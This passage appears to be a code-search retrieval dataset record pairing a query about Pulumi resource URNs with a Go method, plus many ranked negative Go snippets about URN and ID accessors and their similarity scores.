gin.BasicAuth(gin.Accounts{\n\t\t\t// Use the config's username and password for basic auth\n\t\t\tcfg.Username: cfg.Password,\n\t\t})\n\t}\n\treturn CustomAuth(cfg)\n}", "func (r GetAuthorizerRequest) Send(ctx context.Context) (*GetAuthorizerOutput, error) {\n\tr.Request.SetContext(ctx)\n\terr := r.Request.Send()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn r.Request.Data.(*GetAuthorizerOutput), nil\n}", "func GetAuthenticateFunc(addr string, opts ...auth.Option) token.AuthenticateFunc {\n\tintro := newIntrospection(addr, opts...)\n\treturn intro.authenticate\n}", "func GetUser(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *UserState, opts ...pulumi.ResourceOption) (*User, error) {\n\tvar resource User\n\terr := ctx.ReadResource(\"gcp:sql/user:User\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}" ]
[ "0.6288236", "0.61128867", "0.600631", "0.5912986", "0.56904894", "0.55917406", "0.55573034", "0.54324085", "0.5352838", "0.52806234", "0.51653206", "0.51357406", "0.5128047", "0.50898623", "0.5068182", "0.5052384", "0.50460017", "0.4977039", "0.4974712", "0.49660113", "0.49566334", "0.49390435", "0.49128753", "0.49005884", "0.48748896", "0.48423687", "0.48388973", "0.48247138", "0.47828895", "0.47707695", "0.47688568", "0.4735317", "0.4734232", "0.4717498", "0.4716197", "0.47119063", "0.4708", "0.47060892", "0.46880174", "0.46685603", "0.4658929", "0.46568418", "0.46514297", "0.46447098", "0.46339318", "0.46173537", "0.4611648", "0.4592639", "0.45875978", "0.45850378", "0.45786387", "0.45758334", "0.4572761", "0.45614326", "0.45462373", "0.4539245", "0.45220405", "0.4513576", "0.4513576", "0.45129156", "0.45094234", "0.45063865", "0.45008987", "0.44972548", "0.44892702", "0.44877568", "0.44866973", "0.44813067", "0.44795543", "0.4459631", "0.4454043", "0.444874", "0.44438767", "0.4443473", "0.44400963", "0.44257483", "0.44209588", "0.4414676", "0.44082385", "0.44058743", "0.43966165", "0.43901122", "0.4388407", "0.43859246", "0.43859246", "0.43729782", "0.43701407", "0.4367884", "0.43636534", "0.43558463", "0.43433052", "0.4339346", "0.43315756", "0.43231422", "0.43224022", "0.43210542", "0.4314717", "0.43106216", "0.43008563", "0.4300562" ]
0.8224552
0
URN is this resource's unique name assigned by Pulumi.
func (r *Authorizer) URN() pulumi.URNOutput { return r.s.URN() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (e *ExternalService) URN() string {\n\treturn \"extsvc:\" + strings.ToLower(e.Kind) + \":\" + strconv.FormatInt(e.ID, 10)\n}", "func (r *ResourceGroup) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Template) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Policy) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Thing) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (c *Chapter) URN() string {\n\treturn fmt.Sprintf(\"urn:spfg:v1:chapter:%s:%s\", c.ID, slug.Make(c.Name))\n}", "func (r *Trail) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *ScheduledAction) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Network) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *VpcEndpointConnectionNotification) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Bucket) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *PrivateVirtualInterface) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (impl *Server) ResourceName() string {\n\treturn \"server\"\n}", "func (r *Rule) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *VpcLink) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Portfolio) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (ScrapeHostResourceUtilization) Name() string {\n\treturn hostResourceUtilization\n}", "func (r *Distribution) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *LaunchConfiguration) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *SpotDatafeedSubscription) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func URN(x string) (string, error) {\n\tu, err := uuid.Parse(string(x))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn u.URN(), nil\n}", "func (r *LoadBalancerBackendServerPolicy) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *RouteTable) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r Resource) Name() string {\n\treturn r.name\n}", "func (r *Folder) URN() *pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (n *node) IRI() string {\n\treturn n.iri\n}", "func (*pardo) ConfigURN() string {\n\treturn \"pardo\"\n}", "func (r *SshKey) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Cluster) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Cluster) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *RequestValidator) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *VpnConnectionRoute) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *LogGroup) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *DomainName) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *TopicRule) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *DomainIdentity) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *Organization) URN() *pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (m KubedgeBaseManager) ResourceName() string {\n\treturn m.PhaseName\n}", "func (r *Resource) Name() string {\n\treturn Name\n}", "func (r *Resource) Name() string {\n\treturn Name\n}", "func (r *Resource) Name() string {\n\treturn Name\n}", "func (o *AddOn) ResourceName() string {\n\tif o != nil && o.bitmap_&65536 != 0 {\n\t\treturn o.resourceName\n\t}\n\treturn \"\"\n}", "func (r *ServiceLinkedRole) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (r *CachesIscsiVolume) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (this *PodIdentifier) UniqueName() string {\n\treturn this.Namespace + \"/\" + this.Name\n}", "func (r *FirehoseDeliveryStream) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (ipr *Ipref) Name() string { return \"ipref\" }", "func (r *Document) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (o MachineInstanceSpecResourceRefOutput) Uid() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v MachineInstanceSpecResourceRef) *string { return v.Uid }).(pulumi.StringPtrOutput)\n}", "func (jid JID) Resource() string {\n\tif i := strings.Index(string(jid), \"/\"); i != -1 {\n\t\treturn string(jid[i+1:])\n\t}\n\treturn \"\"\n}", "func ToResourceName(name string) string {\n\tif strings.HasPrefix(name, BuiltinGatewaySecretTypeURI) {\n\t\treturn \"default\"\n\t}\n\t// If they explicitly defined the type, keep it\n\tif strings.HasPrefix(name, KubernetesSecretTypeURI) || strings.HasPrefix(name, kubernetesGatewaySecretTypeURI) {\n\t\treturn name\n\t}\n\t// Otherwise, to kubernetes://\n\treturn KubernetesSecretTypeURI + name\n}", "func (o DatasourceOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v Datasource) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (o LookupSpacesBucketResultOutput) Urn() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupSpacesBucketResult) string { return v.Urn }).(pulumi.StringOutput)\n}", "func getRBACResourceName(owner metav1.Object) string {\n\treturn fmt.Sprintf(\"%s-%s-%s-%s\", owner.GetNamespace(), owner.GetName(), cspmRBACPrefix, \"cluster-agent\")\n}", "func (s *InboundNatSpec) ResourceName() string {\n\treturn s.Name\n}", "func (d *Deployment) generateURN(parent resource.URN, ty tokens.Type, name tokens.QName) resource.URN {\n\t// Use the resource goal state name to produce a globally unique URN.\n\tparentType := tokens.Type(\"\")\n\tif parent != \"\" && parent.Type() != resource.RootStackType {\n\t\t// Skip empty parents and don't use the root stack type; otherwise, use the full qualified type.\n\t\tparentType = parent.QualifiedType()\n\t}\n\n\treturn resource.NewURN(d.Target().Name.Q(), d.source.Project(), parentType, ty, name)\n}", "func (i *Resource) Name() string {\n\treturn i.data.Name\n}", "func (r *LoadBalancerCookieStickinessPolicy) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (m *Resource) Name() string {\n\treturn m.name\n}", "func (r DeliveryResource) Name() string {\n\treturn r.Spec.Moniker.String()\n}", "func (r Resource) ID() string {\n\treturn r.id\n}", "func (r *UserProfile) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (resource *ResourceType) ARMURI() string {\n\treturn resource.armURI\n}", "func snakeCaseResourceURI(r *raml.Resource) string {\n\treturn _snakeCaseResourceURI(r, \"\")\n}", "func (n Name) RName() Name { return n }", "func (r *Policy) ResourceId() pulumi.StringOutput {\n\treturn (pulumi.StringOutput)(r.s.State[\"resourceId\"])\n}", "func (t TokenID) URI() string {\n\t// TODO please fix this\n\treturn \"http:=//www.centrifuge.io/DUMMY_URI_SERVICE\"\n}", "func (o DatasourceOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v Datasource) *string { return v.ResourceName }).(pulumi.StringPtrOutput)\n}", "func (o DatasourceResponseOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DatasourceResponse) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (api *Api) ResourceName() string {\n\treturn fmt.Sprintf(\"projects/%s/apis/%s\", api.ProjectID, api.ApiID)\n}", "func (c *ZtunnelComponent) ResourceName() string {\n\treturn c.CommonComponentFields.ResourceName\n}", "func (rp *ResourceProperty) Name() string {\n\treturn rp.PropertyName\n}", "func (r *DefaultVpcDhcpOptions) URN() pulumi.URNOutput {\n\treturn r.s.URN()\n}", "func (o ResourcePolicyExemptionOutput) ResourceId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ResourcePolicyExemption) pulumi.StringOutput { return v.ResourceId }).(pulumi.StringOutput)\n}", "func (o DatasourceResponseOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DatasourceResponse) *string { return v.ResourceName }).(pulumi.StringPtrOutput)\n}", "func (n *piName) Name() string {\n\treturn n.name\n}", "func (u UID) RDF() string {\n\tif len(u.raw) > 0 {\n\t\treturn u.raw\n\t}\n\treturn fmt.Sprintf(\"<%s>\", u.Str)\n}", "func ResourceName(meta *admin.Meta) string {\n\t// follow ptr && slice\n\telemType := meta.FieldStruct.Struct.Type\n\tfor elemType.Kind() == reflect.Slice || elemType.Kind() == reflect.Ptr {\n\t\telemType = elemType.Elem()\n\t}\n\n\t// get empty struct\n\tvalue := reflect.New(elemType).Interface()\n\n\treturn getResourceNameByValue(value)\n}", "func (r UserResource) GetName() string {\n\treturn \"users\"\n}", "func (o ApplicationSpecRolloutplanCanarymetricTemplaterefOutput) Uid() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v ApplicationSpecRolloutplanCanarymetricTemplateref) *string { return v.Uid }).(pulumi.StringPtrOutput)\n}", "func (o KubernetesClusterSpecResourceRefOutput) Uid() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v KubernetesClusterSpecResourceRef) *string { return v.Uid }).(pulumi.StringPtrOutput)\n}", "func (i *Resource) Uri() string {\n\tif i.data.Uri == \"\" {\n\t\tresults, err := i.conn.Search(Id(i.Id())).FindResources(Limit(1))\n\t\tif len(results) == 1 && err == nil {\n\t\t\ti.data.Uri = results[0].Uri()\n\t\t}\n\t}\n\treturn i.data.Uri\n}", "func (r TerraNodeResource) GetName() string {\n\treturn \"terra_node\"\n}", "func (o *VRS) Identifier() string {\n\n\treturn o.ID\n}", "func (self *Rain) Id() string {\n\treturn fmt.Sprintf(\"%02x:%02x\", self.id>>8, self.id&0xff)\n}", "func (o DatasourceSetResponseOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DatasourceSetResponse) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (s *NatGatewaySpec) ResourceName() string {\n\treturn s.Name\n}", "func (o GrafanaAzureMonitorWorkspaceIntegrationOutput) ResourceId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GrafanaAzureMonitorWorkspaceIntegration) string { return v.ResourceId }).(pulumi.StringOutput)\n}", "func ULID() string {\n\tnow := time.Now()\n\tentropy := rand.New(rand.NewSource(now.UnixNano()))\n\treturn ulid.MustNew(ulid.Timestamp(now), entropy).String()\n}", "func ID(namespace, name string) string {\n\treturn fmt.Sprintf(\"%s/%s\", namespace, name)\n}", "func (reca PhoneConnecter9)Name()string{\n\treturn reca.name\n}", "func (o DatasourceSetResponseOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DatasourceSetResponse) *string { return v.ResourceName }).(pulumi.StringPtrOutput)\n}", "func (o LiteSubscriptionOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *LiteSubscription) pulumi.StringOutput { return v.Name }).(pulumi.StringOutput)\n}", "func (m *WindowsUniversalAppX) GetIdentityResourceIdentifier()(*string) {\n return m.identityResourceIdentifier\n}", "func (p *ResourcePool) ID() string {\n\treturn fmt.Sprintf(\"resourcepool(%s)\", p.manager.Name())\n}", "func (o SecretRolesetBindingOutput) Resource() pulumi.StringOutput {\n\treturn o.ApplyT(func(v SecretRolesetBinding) string { return v.Resource }).(pulumi.StringOutput)\n}", "func (c *RestoreItemActionGRPCClient) Name() string {\n\treturn \"\"\n}", "func (Tellurium) GetName() string {\n\treturn \"Tellurium\"\n}", "func (r *Roster) Name() string { return ModuleName }", "func (o *VRSRedeploymentpolicy) Identifier() string {\n\n\treturn o.ID\n}" ]
[ "0.6310668", "0.6242247", "0.62268686", "0.6194743", "0.615504", "0.6015328", "0.5991877", "0.5970723", "0.58543295", "0.5854269", "0.581078", "0.57991636", "0.57965666", "0.57886875", "0.5758153", "0.5749012", "0.5738039", "0.5725185", "0.5713738", "0.57052803", "0.57030535", "0.56941026", "0.5678246", "0.56402886", "0.5622911", "0.5621352", "0.56142706", "0.55986124", "0.558516", "0.558516", "0.55829465", "0.5575904", "0.55741525", "0.55647475", "0.55532783", "0.55466044", "0.55446136", "0.55351526", "0.5529047", "0.5529047", "0.5529047", "0.5512321", "0.5509579", "0.5472794", "0.5472566", "0.5470167", "0.5468041", "0.54606897", "0.54107547", "0.540133", "0.53848636", "0.53661424", "0.5334107", "0.5333642", "0.53279287", "0.5326573", "0.5303037", "0.52983576", "0.52909905", "0.5286848", "0.52656114", "0.52639437", "0.5256886", "0.5190117", "0.51868385", "0.51827943", "0.51784277", "0.5178092", "0.5165842", "0.51596314", "0.5152428", "0.51443803", "0.51324296", "0.5131568", "0.51277995", "0.51243395", "0.5107168", "0.5106699", "0.507913", "0.5076189", "0.507413", "0.5063663", "0.5063328", "0.50594556", "0.50434047", "0.5032746", "0.50325286", "0.5025961", "0.50254965", "0.5021965", "0.5016573", "0.5009295", "0.50055623", "0.500234", "0.49913222", "0.4987112", "0.49835584", "0.49735025", "0.49731737", "0.49700886" ]
0.58101857
11
ID is this resource's unique identifier assigned by its provider.
func (r *Authorizer) ID() pulumi.IDOutput { return r.s.ID() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (id ResourceGroupProviderId) ID() string {\n\tfmtString := \"/subscriptions/%s/resourceGroups/%s/providers/%s/%s/%s/%s/%s\"\n\treturn fmt.Sprintf(fmtString, id.SubscriptionId, id.ResourceGroupName, id.ProviderName, id.ResourceParentType, id.ResourceParentName, id.ResourceType, id.ResourceName)\n}", "func (r Resource) ID() string {\n\treturn r.id\n}", "func (i *Resource) Id() string {\n\treturn i.data.Id\n}", "func (c *Consumer) ID() string { return c.id }", "func (p *PinpointSMS) ID() string {\n\treturn providerID\n}", "func (r ManagedResource) id() ReferenceID { return r.ID }", "func (o AuthProviderOutput) Id() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v AuthProvider) *string { return v.Id }).(pulumi.StringPtrOutput)\n}", "func (p *ResourcePool) ID() string {\n\treturn fmt.Sprintf(\"resourcepool(%s)\", p.manager.Name())\n}", "func (mySource *Source) ID() (param string) {\n\treturn mySource.IDvar\n}", "func (n *resPool) ID() string {\n\treturn n.id\n}", "func (sub *Subscription) ID() string {\n return sub.id\n}", "func (c CSV) ID() uint {\n\treturn c.Resource.ID\n}", "func (o CassandraKeyspaceResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v CassandraKeyspaceResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func ID() int {\n\treturn id\n}", "func (m *MachineScope) ProviderID() string {\n\treturn ptr.Deref(m.AzureMachine.Spec.ProviderID, \"\")\n}", "func (r *Request) ID() string { return string(r.id) }", "func (r *Request) ID() string { return string(r.id) }", "func (s *scwServer) ProviderID() string {\n\treturn \"\"\n}", "func (o SqlDatabaseResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v SqlDatabaseResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (c *Client) ProviderID() gitprovider.ProviderID {\n\treturn ProviderID\n}", "func (o GremlinDatabaseResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GremlinDatabaseResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (r *Response) ID() string { return r.id }", "func (r *Response) ID() string { return r.id }", "func (c *localComponent) ID() dependency.Instance {\n\treturn dependency.PolicyBackend\n}", "func (__receiver_AService *AvailablePhoneNumberService) ID(id string) *AvailablePhoneNumberService {\n\t__receiver_AService.ResourceID = id\n\tswitch __receiver_AService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_AService.data = struct{}{}\n\t\t__receiver_AService.url = resources.AvailablePhoneNumberURLS[types.READ]\n\t\t__receiver_AService.action = types.READ\n\n\t}\n\treturn __receiver_AService\n}", "func (o SqlContainerResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v SqlContainerResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (auth *Authentication) ID() string {\n\treturn auth.UserID\n}", "func (o DatasourceOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v Datasource) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (o CassandraTableResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v CassandraTableResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (o GremlinGraphResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GremlinGraphResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (s *subscription) ID() uint64 {\n\treturn s.id\n}", "func (s *Server) ID() string {\n\treturn s.Config().GetUuid()\n}", "func (ca *NullClientAdapter) ID() string {\n\treturn ca.ClientID\n}", "func (o MongoDBDatabaseResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MongoDBDatabaseResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (f *FFS) ID(ctx context.Context) (ffs.APIID, error) {\n\tresp, err := f.client.ID(ctx, &rpc.IDRequest{})\n\tif err != nil {\n\t\treturn ffs.EmptyInstanceID, err\n\t}\n\treturn ffs.APIID(resp.Id), nil\n}", "func ID() string {\n\treturn appid\n}", "func (c *Connection) ID() string {\n\treturn fmt.Sprintf(\"[%s@%d_%d]\", c.url, c.id, c.cc)\n}", "func (o AuthRequirementOutput) ProviderId() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v AuthRequirement) *string { return v.ProviderId }).(pulumi.StringPtrOutput)\n}", "func (p *Init) ID() string {\n\treturn p.id\n}", "func (__receiver_OService *OutgoingCallerIDService) ID(id string) *OutgoingCallerIDService {\n\t__receiver_OService.ResourceID = id\n\tswitch __receiver_OService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_OService.data = struct{}{}\n\t\t__receiver_OService.url = resources.OutgoingCallerIDURLS[types.READ]\n\t\t__receiver_OService.action = types.READ\n\n\t}\n\treturn __receiver_OService\n}", "func (o TableResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v TableResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (__receiver_RService *RecordingService) ID(id string) *RecordingService {\n\t__receiver_RService.ResourceID = id\n\tswitch __receiver_RService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_RService.data = struct{}{}\n\t\t__receiver_RService.url = resources.RecordingURLS[types.READ]\n\t\t__receiver_RService.action = types.READ\n\n\t}\n\treturn __receiver_RService\n}", "func (c *ConsumerGroupInfo) ID() string {\n\treturn c.id\n}", "func (id SubscriptionId) ID() string {\n\tfmtString := \"/providers/Microsoft.Management/managementGroups/%s/subscriptions/%s\"\n\treturn fmt.Sprintf(fmtString, id.GroupId, id.SubscriptionId)\n}", "func (obj *SObject) ID() string {\n\treturn obj.StringField(sobjectIDKey)\n}", "func (s *ServiceContext) ID() string {\n\treturn path.Base(s.Source.Location)\n}", "func (p ObjectID) ID() string {\n\treturn fmt.Sprintf(\"%d.%d.%d\",\n\t\tp.SpaceType(),\n\t\tp.ObjectType(),\n\t\tp.Instance(),\n\t)\n}", "func (r *PlayerResolver) ID() string {\n\treturn r.p.Id.Hex()\n}", "func ResourceProviderID(input string) (*ResourceProviderId, error) {\n\tid, err := azure.ParseAzureResourceID(input)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresourceId := ResourceProviderId{\n\t\tSubscriptionId: id.SubscriptionID,\n\t\tResourceProvider: id.Provider,\n\t}\n\n\tif resourceId.SubscriptionId == \"\" {\n\t\treturn nil, fmt.Errorf(\"ID was missing the 'subscriptions' element\")\n\t}\n\n\tif resourceId.ResourceProvider == \"\" {\n\t\treturn nil, fmt.Errorf(\"ID was missing the 'providers' element\")\n\t}\n\n\tif err := id.ValidateNoEmptySegments(input); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &resourceId, nil\n}", "func (b *base) ID() string { return b.IDx }", "func (w *W) ID() string {\n\treturn w.Config.URL\n}", "func ResourceId(w http.ResponseWriter, params martini.Params, m martini.Context) {\n\tid, err := strconv.ParseInt(params[\"id\"], 10, 64)\n\n\tif err != nil || id < 1 {\n\t\thttp.Error(w, \"Unprocessable Entity\", 422)\n\t}\n\n\tm.Map(IdParameter{Id: id})\n}", "func (id StreamingLocatorId) ID() string {\n\tfmtString := \"/subscriptions/%s/resourceGroups/%s/providers/Microsoft.Media/mediaServices/%s/streamingLocators/%s\"\n\treturn fmt.Sprintf(fmtString, id.SubscriptionId, id.ResourceGroupName, id.MediaServiceName, id.StreamingLocatorName)\n}", "func (bv *BaseVSphere) ID() string {\n\treturn fmt.Sprintf(\"%s[%s@%s]\", bv.Type, bv.Name, bv.Endpoint)\n}", "func (c *Connector) ID() string {\n\tc.cmu.Lock()\n\tdefer c.cmu.Unlock()\n\treturn c.id\n}", "func (r *ResourceGroup) ID() pulumi.IDOutput {\n\treturn r.s.ID()\n}", "func (s *StandardSubscriber) ID() string {\n\treturn s.id\n}", "func (rc *Ctx) ID() string {\n\treturn rc.id\n}", "func (myTagKey *TagKey) ID() (param string) {\n\treturn myTagKey.IDvar\n}", "func (o MongoDBCollectionResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MongoDBCollectionResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (o *Object) ID() string {\n\treturn o.BucketName + \"/\" + o.Name\n}", "func (c *WSClient) ID() string {\n\treturn c.id.String()\n}", "func (a *Action) ID() common.ID {\n\tdata := a.ActionName + \":\" + a.ResourceLocation\n\tid := base64.StdEncoding.EncodeToString([]byte(data))\n\treturn common.IDString(id)\n}", "func (c *Client) GetID() string {\n\treturn c.providerIdent\n}", "func (client *BaseClient) ID() string {\n\treturn client.id\n}", "func (s *Service) ID(ctx context.Context, req *IDRequest) (*IDReply, error) {\n\ti, err := s.getInstanceByToken(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tid := i.ID()\n\treturn &IDReply{ID: id.String()}, nil\n}", "func (*roleImpl) ID(p graphql.ResolveParams) (string, error) {\n\treturn globalid.RoleTranslator.EncodeToString(p.Source), nil\n}", "func (c *ClaimContent) ID() string {\n\tvar json = jsoniter.ConfigCompatibleWithStandardLibrary\n\tdata, err := json.Marshal(c)\n\tif err != nil {\n\t\treturn \"\"\n\t}\n\t// now simply using sha3.\n\t// TODO change hmac method with algorith\n\tid := sha3.Sum224(data)\n\treturn base64.URLEncoding.EncodeToString(id[:])\n}", "func (d *common) ID() int64 {\n\treturn d.id\n}", "func (e *ChainEncryptor) ID() string {\n\treturn e.id\n}", "func (o AuthRequirementResponseOutput) ProviderId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v AuthRequirementResponse) string { return v.ProviderId }).(pulumi.StringOutput)\n}", "func (se *SharedElement) ID() string {\n\treturn se.id\n}", "func (se *SharedElement) ID() string {\n\treturn se.id\n}", "func (o *Object) ID() string {\n\treturn o.id\n}", "func (o *Object) ID() string {\n\treturn o.id\n}", "func (s FormatTemplate) ID() string {\n\treturn s.id\n}", "func (m *Metadata) ID() string {\n\treturn m.id\n}", "func (tr *CapacityProvider) GetID() string {\n\tif tr.Status.AtProvider.ID == nil {\n\t\treturn \"\"\n\t}\n\treturn *tr.Status.AtProvider.ID\n}", "func (t *Template) ID() string {\n\treturn t.hexMD5\n}", "func (o DatasourceResponseOutput) ResourceID() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DatasourceResponse) string { return v.ResourceID }).(pulumi.StringOutput)\n}", "func (obj *material) ID() *uuid.UUID {\n\treturn obj.id\n}", "func (mc *metaCollector) ID() string {\n\tpanic(\"Should never be called\")\n}", "func (c *client) ID(ctx context.Context) (IDInfo, error) {\n\turl := c.createURL(\"/id\", nil)\n\n\tvar result IDInfo\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\tif ctx != nil {\n\t\treq = req.WithContext(ctx)\n\t}\n\tresp, err := c.client.Do(req)\n\tif err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\tif err := c.handleResponse(resp, \"GET\", url, &result); err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\n\treturn result, nil\n}", "func (o ResourcePolicyExemptionOutput) ResourceId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ResourcePolicyExemption) pulumi.StringOutput { return v.ResourceId }).(pulumi.StringOutput)\n}", "func (this *RouterEntry) Id() string {\n\treturn fmt.Sprintf(\"%s:%d\", this.Address, this.JsonPort)\n}", "func (decryptor *PgDecryptor) ID() string {\n\treturn \"PgDecryptor\"\n}", "func getInstanceID(providerID string) string {\n\tproviderTokens := strings.Split(providerID, \"/\")\n\treturn providerTokens[len(providerTokens)-1]\n}", "func getInstanceID(providerID string) string {\n\tproviderTokens := strings.Split(providerID, \"/\")\n\treturn providerTokens[len(providerTokens)-1]\n}", "func (c *ZeroContext) ID() uid.ID {\n\treturn c.id\n}", "func (c complete) ID() string { return c.id }", "func (s Secret) ID() string {\n\treturn s.Namespace\n}", "func (a *App) ID() string { return a.opts.id }", "func (client *Client) ID() string {\n\tclient.mutex.RLock()\n\tdefer client.mutex.RUnlock()\n\n\treturn client.id\n}", "func (s StringTemplate) ID() string {\n\treturn s.id\n}", "func (p *Peer) ID() string {\n\treturn fmt.Sprintf(\"%s.%s\", p.Organization, p.Name)\n}", "func (id PacketCoreControlPlaneId) ID() string {\n\tfmtString := \"/subscriptions/%s/resourceGroups/%s/providers/Microsoft.MobileNetwork/packetCoreControlPlanes/%s\"\n\treturn fmt.Sprintf(fmtString, id.SubscriptionId, id.ResourceGroupName, id.PacketCoreControlPlaneName)\n}", "func (conn *Connection) ID() string {\n\treturn conn.id\n}", "func (p *Person) ID() string {\n\treturn fmt.Sprintf(\"Person's identifier: %s\", p.Citizen.ID())\n}", "func (u User) ID() string {\n\tif u.IsAnonymous() {\n\t\treturn \"user/anonymous\"\n\t}\n\treturn \"user/\" + string(u)\n}", "func (e *ReferenceDatasetEngine) ID() string {\n\treturn e.Id\n}" ]
[ "0.77244645", "0.7674558", "0.72857183", "0.7220597", "0.7069998", "0.68257725", "0.68159103", "0.67238456", "0.6696106", "0.6684843", "0.668004", "0.6648919", "0.66450715", "0.6630396", "0.6594919", "0.65727526", "0.65727526", "0.65422493", "0.6540629", "0.6530791", "0.65282404", "0.6527786", "0.6527786", "0.6521048", "0.64827645", "0.64714617", "0.6454316", "0.64497614", "0.6427556", "0.6413681", "0.6391279", "0.6391263", "0.6390525", "0.63881737", "0.6380542", "0.63802725", "0.63747025", "0.6369483", "0.63675773", "0.63558745", "0.6349104", "0.63387704", "0.63387287", "0.63301647", "0.6325218", "0.632326", "0.6315679", "0.6304642", "0.6300623", "0.63001496", "0.6298724", "0.6291974", "0.6284222", "0.628305", "0.6281267", "0.62644523", "0.6258831", "0.6255351", "0.6254607", "0.62530214", "0.6252887", "0.6251472", "0.62505174", "0.62475276", "0.6244219", "0.62418324", "0.62215775", "0.621934", "0.6203801", "0.6198178", "0.6192154", "0.61895686", "0.61895686", "0.6180478", "0.6180478", "0.617961", "0.6176073", "0.6175079", "0.61739165", "0.61726266", "0.6171298", "0.61689144", "0.6166932", "0.61660814", "0.61611265", "0.61584014", "0.61557865", "0.61557865", "0.61479235", "0.6130143", "0.6130048", "0.6121104", 